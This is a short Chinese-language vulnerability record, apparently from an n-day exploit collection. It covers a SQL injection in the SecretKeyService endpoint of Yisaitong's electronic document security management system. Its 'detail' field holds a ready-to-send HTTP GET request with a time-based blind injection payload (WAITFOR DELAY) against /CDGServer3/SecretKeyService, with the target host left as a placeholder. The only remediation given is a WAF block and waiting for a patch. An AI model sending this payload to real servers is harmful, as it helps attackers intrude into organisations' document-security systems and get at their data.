vendor = "亿赛通"
name = "亿赛通电子文档安全管理系统SecretKeyService存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/CDGServer3/SecretKeyService"
detail = "GET /CDGServer3/SecretKeyService?command=sameKeyName&keyName=1'+WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1 Host: your-ip"
fix = "WAF封禁路路径，等待发布补丁"
date = "0813"
label = "nday"
